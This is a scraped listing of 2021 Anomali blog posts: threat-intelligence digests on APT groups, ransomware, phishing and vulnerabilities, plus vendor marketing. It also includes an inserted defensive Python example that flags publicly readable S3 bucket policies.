What's new around the internet

Latest entries. Columns: Source, Date (GMT), Title, Description, Tags, Stories, Notes.
Anomali | 2021-10-12 17:41:00 | Anomali Cyber Watch: Aerospace and Telecoms Targeted by Iranian MalKamak Group, Cozy Bear Refocuses on Cyberespionage, Wicked Panda is Traced by Malleable C2 Profiles, and More (direct link)

The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data leak, Ransomware, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Russian Cyberattacks Pose Greater Risk to Governments and Other Insights from Our Annual Report (published: October 7, 2021)
Approximately 58% of all nation-state attacks observed by Microsoft between July 2020 and June 2021 have been attributed to Russian-sponsored threat groups, specifically to Cozy Bear (APT29, Nobelium), associated with the Russian Foreign Intelligence Service (SVR). The United States, Ukraine, and the UK were the top three countries targeted by them. Russian Advanced Persistent Threat (APT) actors increased their effectiveness from a 21% successful compromise rate to a 32% rate year over year. They achieve this by starting an attack with supply-chain compromise, utilizing effective tools such as web shells, and increasing their skills in targeting cloud environments. Russian APTs are increasingly targeting government agencies for intelligence gathering, which jumped from 3% of their targets a year ago to 53%, largely agencies involved in foreign policy, national security, or defense. Following Russia by the number of APT cyberattacks were North Korea (23%), Iran (11%), and China (8%).
Analyst Comment: As the collection of intrusions for potential disruption operations via critical infrastructure attacks became too risky for Russia, it refocused on gaining access to and harvesting intelligence. The scale and growing effectiveness of this cyberespionage require a defence-in-depth approach and tools such as Anomali Match that provide real-time forensics capability to identify potential breaches and known actor attributions.
MITRE ATT&CK: Supply Chain Compromise - T1195 | Server Software Component - T1505 | Phishing - T1566 | Brute Force - T1110
Tags: Fancy Bear, APT28, APT29, The Dukes, Strontium, Nobelium, Energetic Bear, Cozy Bear, Government, APT, Russia, SVR, China, North Korea, USA, UK, Ukraine, Iran

Ransomware in the CIS (published: October 7, 2021)
Many prominent ransomware groups have members located in Russia and the Commonwealth of Independent States (CIS), and they avoid targeting this region. Still, businesses in the CIS are at risk of being targeted by dozens of lesser-known ransomware groups. Researchers from Kaspersky Labs have published a report detailing nine business-oriented ransomware trojans that were most active in the CIS in the first half of 2021. These ransomware families are BigBobRoss (TheDMR), Cryakl (CryLock), CryptConsole, Crysis (Dharma), Fonix (XINOF), Limbozar (VoidCrypt), Phobos (Eking), Thanos (Hakbit), and XMRLocker. The oldest, Cryakl, has been around since April 2014, and the newest, XMRLocker, was first detected in August 2020. Most of them were mainly distributed via the cracking of Remote Deskto

Tags: Ransomware, Malware, Tool, Threat, Guideline, Prediction
Stories: APT 41, APT 39, APT 29, APT 28
Anomali | 2021-10-06 15:00:00 | Thanks to Our Employees, Customers, and Partners, We Are Racing Ahead with Cloud XDR Innovations (direct link)

Anomali is off to the races in this new fiscal year, fueled by our intelligence-driven security that addresses our customers' differentiated threat detection use cases. We would like to thank our incredible employees who get up every morning to help our customers and partners stop breaches and attackers. Not only are we setting new records for the company, but we are also meaningfully helping businesses across the world succeed with their XDR framework. We thank our valued customers and partners for entrusting us to help them with their security efficacy and efficiency. Our business continues to expand across the Fortune 500 and similar enterprise companies across the globe. We are expanding our government business with recent additions like the US Air Force and US Navy and have commenced our investment in building a FedRAMP certification program. We are also expanding our global channel partner program and opening new routes to market. We are particularly excited about our recent partnership with Capgemini, a leading global MDR/XDR provider. We expect our Cloud open XDR product to be released in early spring. The respective beta program starts in December, and we are very pleased with the tremendous excitement from existing, prospective, and former customers that are going to participate. At Anomali, we take pride in being the hub of trusted circles for our customers and partners and in the fact that we seamlessly integrate with almost everyone in the security ecosystem. We believe that effective security operations start and end with global intelligence. Furthermore, we focus on differentiated use cases built with our customers and partners that enhance both security efficacy and efficiency, making us the Anomali in XDR (see image: Anomali in XDR).

Tags: Threat, Guideline
Anomali | 2021-10-05 18:28:00 | Anomali Cyber Watch: New APT ChamelGang, FoggyWeb, VMWare Vulnerability Exploited and More (direct link)

The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, FoggyWeb, Google Chrome Bugs, Hydra Malware, NOBELIUM and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Google Just Patched These Two Chrome Zero-day Bugs That Are Under Attack Right Now (published: October 1, 2021)
Google has warned users of Google Chrome to update to version 94.0.4606.71, due to two new zero-days that are currently being exploited in the wild. This marks the second update in a month due to actively exploited zero-day flaws. The first of these common vulnerabilities and exposures (CVEs), CVE-2021-37975, is a high severity flaw in the V8 JavaScript engine, which has been notoriously difficult to protect and could allow attackers to create malware that is resistant to hardware mitigations.
Analyst Comment: Users and organizations are recommended to regularly check for and apply updates to the software applications they use, especially web browsers, which are increasingly used for a variety of tasks. Organizations can leverage the capabilities of Anomali ThreatStream to rapidly get information about new CVEs that need to be mitigated through their vulnerability management program.
Tags: CVE-2021-37975, CVE-2021-37976, chrome, zero-day

Hydra Malware Targets Customers of Germany's Second Largest Bank (published: October 1, 2021)
A new campaign leveraging the Hydra banking trojan has been discovered by researchers. The malware, delivered as an Android application, impersonates the legitimate application for Germany's largest bank, Commerzbank. While Hydra has been seen for a number of years, this new campaign incorporates many new features, including abuse of the Android accessibility features and permissions, which give the application the ability to stay running and hidden with essentially full administrator privileges over a victim's phone. It appears to be initially spread via a website that imitates the official Commerzbank website. Once installed, it can spread via bulk SMS messages to a user's contacts.
Analyst Comment: Applications, particularly banking applications, should only be installed from trusted and verified sources and reviewed for suspicious permissions they request. Similarly, emails and websites should be verified before use.
Tags: Banking and Finance, EU, Hydra, trojan

New APT ChamelGang Targets Russian Energy, Aviation Orgs (published: October 1, 2021)
A new Advanced Persistent Threat (APT) group dubbed "ChamelGang" has been identified targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server's ProxyShell and leveraging both new and existing malware to compromise networks. Researchers at Positive Technologies have been tracking the group since March 2017, and have observed that they have attacked targets in 10 countries so far. The group has been able to hi

Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Guideline
Stories: SolarWinds, APT 27
Anomali | 2021-10-04 11:00:00 | The Need for Intelligence-Driven XDR to Address Security Team Challenges (direct link)

As organizations continue to expand and evolve their digital footprint, security staff struggle to adapt operations quickly enough to ensure effective monitoring and response to incidents in their environment. These challenges are even more difficult due to limited staff and expertise. Enter extended detection and response, or XDR. Depending on who you ask, you'll get differing opinions about what XDR is, where it came from, and whether or not you need it. The fact is that security teams continue to struggle with too many security tools from different vendors, with little integration of data or relevant threat intelligence. These tools generate an alarming volume of alerts, leading to analysts chasing false positives or not looking into data because they lack the intelligence and expertise to prioritize the alerts that matter. They're also working in siloed environments, which makes it hard to collaborate and leads to more problems, including:
- Overwhelming volumes of data make it difficult to prioritize security efforts and response
- They lack insight into global threats and incidents and are unable to recognize the potential impact of known and unknown threats
- The detection technologies they've installed are riddled with false positives that waste staff time
- The reliance on a single vendor and the inability to tune security controls across multi-vendor security stacks make it harder to prioritize investigations and incident response efforts

This is where XDR solutions come into play. We've aligned ourselves with Gartner's definition of XDR, which states: "XDR is a security threat detection and incident response tool that natively integrates multiple security products into a cohesive security operations system that unifies all licensed components."

In layman's terms: XDR provides a holistic, more straightforward view of threats across an organization's entire technology landscape, providing the real-time information needed to deliver threats to the right people for better, faster outcomes. Security teams can no longer rely only on the same tools they've used for threat detection and response. Automation and big data management are needed to collect data across all installed security telemetry, along with advanced intelligence to understand and correlate threats. The improved automation allows teams to sift through the never-ending deluge of data to pinpoint relevant threats and quickly respond to those that matter before they turn into something catastrophic. Anomali's XDR solution combines our global threat intelligence with extended detection capabilities to stop breaches and attackers. Anomali XDR delivers:
- Unified threat detection utilizing all installed security telemetry
- Precision detection with timely alerts to stop threats earlier
- Increased ROI with less administrative overhead
- Higher fidelity alerts to reduce false positives and empower stretched IT teams
- Retrospective search capabilities across 5+ years

Take a look at our webinar to learn more about how we can help you Pinpoint Relevant Threats w

Tags: Tool, Threat, Guideline
Anomali | 2021-09-30 14:30:00 | The Need for Savvy Sharing of Threat Intelligence (direct link)

Age of Threat Intelligence Sharing
Given the range and sophistication of threat actors, combined with digital transformation and the proliferation of remote devices forming a growing potential attack surface, sharing threat intelligence has become vital. Not to mention, threat intelligence sharing was a key component listed in President Biden's Executive Order on cybersecurity. A company can no longer operate in a silo when cyber adversaries leverage a full range of tactics across multiple industries. Having a broader picture of these actors and their motivations requires sharing threat intelligence, which reduces duplication of effort and response time.

Intel Sharing Balancing Act
While there are justifiable concerns with sharing threat intel, the benefits to be gained by sharing smartly are compelling enough to navigate the legal and security issues. The goal of any cybersecurity program should be to detect potential indicators of compromise (IoCs) as rapidly as possible and perform mitigation before they reach the edges of the network. To quickly detect changes in the cybersecurity landscape, a wide scope of visibility is needed. When a company is actively engaged in sharing threat intel, the relevant information is passed quickly and more well-informed decisions can be made. In addition, analyses for internal stakeholders and intel consumers can be more insightful, relevant, and actionable. Privacy and liability are issues that need to be addressed. Data should be scrubbed for private information or sensitive corporate information before sharing, and this should be set up ahead of time for any type of automated data transfer. Legal guidelines such as CISA or EU GDPR can help conform to regulations.

Preparing for Information Sharing
According to a guide published by NIST, preparation for a sharing program should include the following:
- Define the goals and objectives of information sharing
- Identify internal sources of threat information
- Define the scope of information sharing activities
- Establish information sharing rules
- Join a sharing community
- Plan to provide ongoing support for information sharing activities

Starting small will help expand sharing in a safe and relevant manner. Learning to optimize the type of data, how to share it, and with whom to share it helps to create an efficient and cost-effective program. Gaining C-level and management support is essential to obtaining the necessary tools and cooperation. A cost/benefit analysis will help to convince management that the risks of sharing can be minimized and that the upside will not only make the company safer but also save costs. Sharing intel may not only save a company from an expensive breach but can also save costs through better allocation of resources. For example, metrics may include a decrease in alert events or incidents from getting ahead of an attack due to the sharing of cyber threat intelligence. An Accenture report on the cost of cybercrime found that security intelligence and threat sharing were a top cost-saving measure, saving companies on average $2.26M.

What Intel Should be Shared?
A good way to get started sharing intelligence is to collaborate and add context to other parties' shared information. This could include observed adversary behaviors, attacks seen, or details of incident response. Historical context can also be quite

Tags: Threat, Guideline
Anomali | 2021-09-29 17:00:00 | Introducing the Anomali Technology Partner Program (TPP) (direct link)

Delivering a broad spectrum of threat intelligence and security integrations for the Anomali community

Technology partners have always been an integral part of the value proposition that Anomali brings to our customers. From integrating with leading global research vendors to deliver global threat intelligence at scale, to automated delivery of intelligence to security control products for remediation, our broad partner ecosystem is invaluable. Today we're announcing the Anomali Technology Partner Program (TPP), a significant investment that will provide technology partners everything they need to develop innovative and differentiated product and service offerings that complement Anomali's solution portfolio.

Partner Tiers
The program is designed to reward partners who make the biggest commitment to developing value-added solutions that solve customer problems and drive mutual business. The program is structured around the following partner tiers based on the depth of the partnership (see image: TPP Partner Tiers). Partners will have the opportunity to get promoted from the Foundation to the Advanced tier as their integrated solutions get deployed in the marketplace. Participation at the Premier tier comes with the most benefits across technical, marketing and sales activities, and is by invitation only.

Criteria for Participation and Partner Tiering
There are many factors to consider when establishing a technology partnership. At Anomali we're completely focused on customer satisfaction, so we ask that partners have at least one customer requesting the integration, which ensures we're meeting a need in the marketplace. Below are the primary criteria used for program participation and how Anomali places partners in the three different tiers (see image: Criteria for Participation and Partner Tiering).

Partner Integration Tracks
One thing that hasn't changed is the types of integrations that Anomali will deliver via our partner ecosystem. Intelligence sharing is core to everything we do and is critical for successfully stopping attackers and preventing breaches. Below are the three integration tracks available through the program (see image: Partner Integration Tracks).

Summary
Heterogeneous environments are a reality and customers need solutions that are integrated and drive value out-of-the-box. The Anomali TPP delivers a broad array of specialized threat intelligence and integrations with leading security technology vendors to speed detection, streamline investigations and increase analyst productivity. Contact techpartners@anomali.com to learn more or apply for program membership.

Tags: Threat, Guideline
Anomali | 2021-09-14 15:00:00 | Anomali Cyber Watch: Azurescape Cloud Threat, MSHTML 0-Day in The Wild, Confluence Cloud Hacked to Mine Monero, and More (direct link)

The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android, APT, Confluence, Cloud, MSHTML, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the "anomali cyber watch" tag.

Trending Cyber News and Threat Intelligence

S.O.V.A. – A New Android Banking Trojan with Fowl Intentions (published: September 10, 2021)
ThreatFabric researchers have discovered a new Android banking trojan called S.O.V.A. The malware is still in the development and testing phase, and the threat actor is publicly advertising S.O.V.A. for trial runs targeting banks to improve its functionality. The trojan's primary objective is to steal personally identifiable information (PII). This is conducted through overlay attacks, keylogging, man-in-the-middle attacks, and session cookie theft, among others. The malware author is also working on other features, such as distributed denial-of-service (DDoS) and ransomware, on S.O.V.A.'s project roadmap.
Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Only use official locations such as the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. Furthermore, always review the permissions an app will request upon installation.
MITRE ATT&CK: Input Capture - T1056 | Man-in-the-Middle - T1557 | Steal Web Session Cookie - T1539 | Network Denial of Service - T1498 | Data Encrypted for Impact - T1486
Tags: Android, Banking trojan, S.O.V.A., Overlay, Keylogging, Cookies, Man-in-the-Middle

Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances (published: September 9, 2021)
Unit 42 researchers identified and disclosed critical security issues in Microsoft's Container-as-a-Service (CaaS) offering called Azure Container Instances (ACI). A malicious Azure user could have compromised the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. Researchers gave the vulnerability a specific name, Azurescape, highlighting its significance: it is the first cross-account container takeover in the public cloud.
Analyst Comment: Azurescape vulnerabilities could have allowed an attacker to execute code on other users' containers, steal customer secrets and images deployed to the platform, and abuse ACI's infrastructure processing power. Microsoft patched ACI shortly after the discl

Tags: Ransomware, Spam, Malware, Tool, Vulnerability, Threat, Guideline
Stories: Uber, APT 41, APT 15
Anomali | 2021-09-07 19:29:00 | Anomali Cyber Watch: FIN7 Using Windows 11 To Spread JavaScript Backdoor, Babuk Source Code Leaked, Feds Warn Of Ransomware Attacks Ahead Of Labor Day and More (direct link)

The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Babuk, Cryptocurrency, Data breach, FIN7, Proxyware, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Cybercrime Group FIN7 Using Windows 11 Alpha-Themed Docs to Drop Javascript Backdoor (published: September 3, 2021)
Researchers from the Anomali Threat Research team have identified six Windows 11 themed malicious Word documents, likely being used by the threat actor FIN7 as part of phishing or spearphishing attacks. The documents, dating from late June/early July 2021, contain malicious macros that are used to drop a JavaScript backdoor, following TTPs from previous FIN7 campaigns. FIN7 is a prolific Eastern European cybercrime group, believed to be responsible for stealing over 15 million card records in the US alone. Despite several high profile arrests, activity like this illustrates they are more than capable of continuing to target victims.
Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network; this makes it easier to spot unusual traffic and connections to and from your network and potentially identify malicious activity. Furthermore, ensure that your employees are educated about the risks of opening attachments, particularly from unknown senders and any attachment that requests macros be enabled.
MITRE ATT&CK: Command and Scripting Interpreter - T1059 | User Execution - T1204 | Windows Management Instrumentation - T1047 | Deobfuscate/Decode Files or Information - T1140 | Obfuscated Files or Information - T1027 | Virtualization/Sandbox Evasion - T1497 | Account Discovery - T1087
Tags: FIN7, phishing, spearphishing, maldoc, Windows 11, carding POS, javascript, backdoor, CIS

Feds Warn of Ransomware Attacks Ahead of Labor Day (published: September 1, 2021)
The FBI and CISA put out a joint cybersecurity advisory Tuesday noting that ransomware actors often ambush organizations on holidays and weekends when offices are normally closed, making the upcoming three-day weekend a prime opportunity for threat activity. Often during holiday weekends, IT departments are staffed by skeleton crews, limiting their ability to respond to and remediate incidents. Holidays can also present tempting lures for phishing attacks. While the agencies haven'

Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Guideline
Anomali | 2021-08-31 16:40:00 | Anomali Cyber Watch: Ransomware Group Activity, Credential Phishing with Trusted Redirects, F5 BIG-IP Bugs, and More (direct link)

The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android, Backdoor, FIN8, iPhone, Phishing, Vulnerabilities, and XSS. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the "Anomali Cyber Watch" tag.

Trending Cyber News and Threat Intelligence

Widespread Credential Phishing Campaign Abuses Open Redirector Links (published: August 26, 2021)
Microsoft has identified a phishing campaign that utilizes trusted domains combined with domain-generating algorithms and CAPTCHA portals that redirect users to malicious websites. These sites will prompt users to "re-enter" their credentials, scraping the login data. Since the initial domains are trusted, standard measures such as mousing over the link will only show the trusted site, and email filters have been allowing the traffic.
Analyst Comment: Because of the nature of these types of phishing attacks, only reset your password by going through the official domain website and not through any emailed links. Be sure to check the URL address if going through a link, to verify the site before entering any credential information.
MITRE ATT&CK: Masquerading - T1036 | OS Credential Dumping - T1003 | Spearphishing Link - T1192 | Domain Trust Discovery - T1482
Tags: Phishing, Microsoft, North America, Anomali Cyber Watch

FIN8 Cybercrime Gang Backdoors US Orgs with New Sardonic Malware (published: August 25, 2021)
FIN8, the financially motivated threat group known for targeting the retail, restaurant, and healthcare industries, is using a new malware variant with the end goal of stealing payment card data from POS systems. "Sardonic" is a new C++-based backdoor deployed on targets' systems, likely via social engineering or spear-phishing. While the malware is still under development, its functionality includes system enumeration, code execution, persistence and DLL-loading capabilities.
Analyst Comment: Ensure that your organization is using good basic cyber security habits. It is important that organizations and their employees use strong passwords that are not easily guessable and do not use the default administrative passwords provided, because of their typically weak security. Update firewalls and antivirus software to ensure that systems can detect breaches or threats as soon as possible to reduce the severity of consequences. Educate employees on the dangers of phishing emails and teach them how to detect malicious emails. It is also recommended to encrypt any sensitive data at rest and in transit

Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Guideline
Anomali | 2021-08-30 14:21:00 | White House Continues to Push for Increased Cybersecurity with Meeting with Tech CEOs (direct link)

More than two dozen leaders of key groups across a variety of fields met at the White House last week to address escalating cyber threats. This included:
- CEOs of major tech companies such as Alphabet, Amazon, Apple, IBM, and Microsoft
- Heads of major financial institutions such as Bank of America and JPMorgan
- Several energy and water companies, including the leaders of Duke Energy, PG&E, and Southern Company
- The leaders of Travelers and the University of Texas system
- Officials from Duke Energy, Pacific Gas and Electric, and Southern Company

The gathering focused on improving information sharing between government agencies, developing new tools to protect critical infrastructure systems, and creating incentives for businesses to adopt better security practices. While it was originally stressed that there was no specific agenda or list of recommendations coming out of the event, which was billed as an opportunity for attendees to brainstorm ideas, what came out was much more than originally expected: the White House, big tech firms, cyber insurers, and educational organizations pledged to pour more resources into improving the nation's cybersecurity. A variety of near-term funds and initiatives aimed at improving software supply chain security, expanding the cybersecurity workforce, and improving the cyber hygiene of organizations and the general public were promised by public and private partners. Meeting attendees also promised both free tools and incentives to help individuals and organizations increase their security posture. President Biden has been vocal about his concerns regarding growing cyberthreats since he took office. He warned about them during his first speech as president, calling it a "cybersecurity emergency" and pledging to work closely with Congress to develop solutions.

To prevent future breaches we can't afford not to act. Brainstorming sessions are great, but security leaders need to think outside of the box and not rely on the same old same old. The threat landscape is constantly evolving, but are cybersecurity leaders evolving their approach just as fast? In previous blogs, I've stressed that an optimized threat response requires informed courses of action that can often be acquired through threat intelligence sharing with industry peers. It is clear that secure collaboration is one of the keys to improving the nation's as well as individual organizations' cybersecurity defenses. Anomali continues to increase our support for sharing intelligence, providing tools such as Anomali STAXX, a free solution that supports sharing indicators through STIX and TAXII.

Organizations have long sought to bridge security gaps between technologies and people within their organization. Most enterprises have dozens of cybersecurity tools deployed and access to mass volumes of related information, but they continue to work in silos. By breaking barriers between security information silos and functions, organizations can unify key processes and close significant gaps between detection and response capabilities. But this type of cross-functional collaboration isn't always easy. It requires trust, transparency, and a shared understanding of business objectives. This way of thinking can also be applied more broadly across the industry. Coming together in brainstorming sessions such as this and pledging resources is a step in the right direction. To learn more about the benefits of sharing threat intelligence, download our whitepaper: The Definitive Guide to Sharing Threat Intelligence

Tags: Threat, Guideline
Anomali.webp 2021-08-17 17:56:00 Anomali Cyber Watch: Anomali Cyber Watch: Aggah Using Compromised Websites to Target Businesses Across Asia, eCh0raix Targets Both QNAP and NAS, LockBit 2.0 Targeted Accenture, and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, Critical Infrastructure, Data Storage, LockBit, Morse Code, Ransomware, and Vulnerabilities. . The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Colonial Pipeline Reports Data Breach After May Ransomware Attack (published: August 16, 2021) Colonial Pipeline, the largest fuel pipeline in the United States, is sending notification letters to 5,810 individuals affected by the data breach resulting from the DarkSide ransomware attack. During the incident, which occurred during May this year, DarkSide also stole roughly 100GB of files in about two hours. Right after the attack Colonial Pipeline took certain systems offline, temporarily halted all pipeline operations, and paid $4.4 million worth of cryptocurrency for a decryptor, most of it later recovered by the FBI. The DarkSide ransomware gang abruptly shut down their operation due to increased level of attention from governments, but later resurfaced under new name BlackMatter. Emsisoft CTO Fabian Wosar confirmed that both BlackMatter RSA and Salsa20 implementation including their usage of a custom matrix comes from DarkSide. Analyst Comment: BlackMatter (ex DarkSide) group added "Oil and Gas industry (pipelines, oil refineries)" to their non-target list, but ransomware remains a significant threat given profitability and the growing number of ransomware threat actors with various levels of recklessness. 
Double-extortion schemes add data exposure to a company's risks. Stopping ransomware affiliates requires defense in depth, including patch management, enhancing your Endpoint Detection and Response (EDR) tools with ThreatStream, the threat intelligence platform (TIP), and utilizing data loss prevention (DLP) systems. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: Darkside, BlackMatter, Colonial Pipeline, Oil and Gas, Ransomware, Salsa20, Data Breach, USA Indra — Hackers Behind Recent Attacks on Iran (published: August 14, 2021) Check Point Research discovered that a July 2021 cyber attack against the Iranian railway system was carried out by Indra, a non-government group. The attackers had access to the targeted networks for a month and then deployed a previously unseen file wiper called Meteor, effectively disrupting train service throughout the country. Previous versions of the Indra wiper, named Stardust and Comet, were seen in Syria, where Indra had been attacking the oil, airline, and financial sectors since at least 2019. Analyst Comment: It is concerning that even non-government threat actors can damage critical infrastructure in a large country. As with ransomware protection, organizations facing wiper attacks should improve their intrusion detection methods and maintain a resilient backup system. MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 | [MITRE ATT&CK] File Deletion - T1107 | Ransomware Data Breach Malware Hack Tool Vulnerability Threat Guideline APT 27
Anomali.webp 2021-08-10 17:39:00 Anomali Cyber Watch: GIGABYTE Hit By RansomEXX Ransomware, Seniors' Data Exposed, FatalRat Analysis, and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Chinese state hackers, Data leak, Ransomware, RAT, Botnets, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Actively Exploited Bug Bypasses Authentication On Millions Of Routers (published: August 7, 2021) The ongoing attacks, discovered by Juniper Threat Labs researchers, exploit the recently disclosed vulnerability CVE-2021-20090. This is a critical path traversal vulnerability in the web interfaces of routers with Arcadyan firmware that could allow unauthenticated remote attackers to bypass authentication. The total number of devices exposed to attacks likely reaches millions of routers. Researchers identified attacks originating from China that deploy a variant of the Mirai botnet on vulnerable routers. Analyst Comment: Attackers run continuous, automated routines to find publicly accessible vulnerable routers and exploit them as soon as an exploit is made public. To reduce the attack surface, a router's management console should only be accessible from specific public IP addresses. Default passwords and other security settings should also be changed to harden the device. Tags: CVE-2021-20090, Mirai, China Computer Hardware Giant GIGABYTE Hit By RansomEXX Ransomware (published: August 7, 2021) The attack occurred late Tuesday night into Wednesday and forced the company to shut down its systems in Taiwan. 
The incident also affected multiple company websites, including its support site and portions of the Taiwanese website. The attackers have threatened to publish 112GB of stolen data, which they claim includes documents under NDA (Non-Disclosure Agreement) from companies including Intel, AMD, and American Megatrends, unless a ransom is paid. Analyst Comment: At this point there is no official confirmation of the attack from GIGABYTE, and no clarity yet on the vulnerabilities or attack vectors used to carry it out. Tags: RansomEXX, Defray, Ransomware, Taiwan Millions of Senior Citizens' Personal Data Exposed By Misconfiguration (published: August 6, 2021) Researchers discovered a misconfigured Amazon S3 bucket owned by the Senior Advisor website, which hosts ratings and reviews for senior care services across the US and Canada. The bucket contained more than one million files and 182 GB of data, including names, emails, and phone numbers of senior citizens from North America. The exposed data was not encrypted and did not require a password or login credentials to access. Analyst Comment: Senior citizens are at high risk of online fraud. Leaked personal information and context about appointments can lead to targeted phishing scams. Tags: Data Leak, Phishing, North America, AWS Malware Vulnerability Threat Guideline APT 41 APT 30 APT 27 APT 23
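The Senior Advisor exposure above is the classic "anyone can read" bucket. The check below is an added example, not code from the Anomali digest or from the researchers who found the bucket: it evaluates an S3 bucket policy document offline and reports statements that grant read or list access to an anonymous principal, separating unconditional grants (public) from grants scoped by a Condition (worth a human review). The policy JSON, bucket name, VPC endpoint ID and account ID are constructed placeholders; no AWS API is called.

```python
"""Flag S3 bucket policy statements that grant anonymous (public) read access.

Added example, not from the Anomali article. Input is a constructed bucket
policy in the standard AWS policy JSON shape; it runs offline.
"""
import json

# Actions that let an anonymous caller read or enumerate bucket contents.
READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:getobjectversion", "s3:*", "*"}


def _as_list(value):
    """Policy fields such as Action or Principal.AWS may be a string or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_anonymous(principal):
    """True when the Principal matches everyone: "*" or {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(p == "*" for p in _as_list(principal.get("AWS")))
    return False


def public_read_statements(policy_json):
    """Return {"public": [...], "review": [...]} of statement Sids (or indices).

    A statement is 'public' when it Allows a read action to an anonymous
    principal with no Condition; conditional anonymous grants (for example
    aws:SourceVpce) land in 'review' so a person can judge whether the
    condition really limits the audience.
    """
    policy = json.loads(policy_json)
    public, review = [], []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_anonymous(stmt.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        if not actions & READ_ACTIONS:
            continue
        label = stmt.get("Sid", f"statement[{idx}]")
        (review if stmt.get("Condition") else public).append(label)
    return {"public": public, "review": review}


# Constructed sample: the first statement is the misconfiguration, the second
# is an anonymous grant limited to one VPC endpoint, the third is a normal
# role-scoped grant. Bucket, endpoint and account identifiers are placeholders.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::example-bucket",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}},
        {"Sid": "AppRole", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/app"},
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
})

if __name__ == "__main__":
    print(public_read_statements(SAMPLE_POLICY))
```

In a real sweep the policy comes from `get_bucket_policy` per bucket, and a bucket with an account-level or bucket-level Public Access Block set to block all public policies can be skipped, since that setting overrides any statement the script would flag.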
Anomali.webp 2021-08-03 15:00:00 Anomali Cyber Watch: LockBit ransomware, Phony Call Centers Lead to Exfiltration and Ransomware, VBA RAT using Double Attack Vectors, and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android malware, APT, Data leak, macOS malware, Phishing, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence BazaCall: Phony Call Centers Lead to Exfiltration and Ransomware (published: July 29, 2021) BazaCall campaigns have forgone malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. Actual humans then provide the callers with step-by-step instructions for installing malware. The BazaLoader payload from these campaigns also gives a remote attacker hands-on-keyboard control of an affected user's device, which allows for a fast network compromise. The lack of obvious malicious elements in the delivery method could render typical ways of detecting spam and phishing emails ineffective. Analyst Comment: All users should be informed of the risk phishing poses and how to safely make use of email. They should take notice that a phone number sent to them can be fraudulent too. In the case of infection, the affected system should be wiped and reformatted, and if at all possible the ransom should not be paid. Implement a backup solution for your users to ease the pain of losing sensitive and important data. 
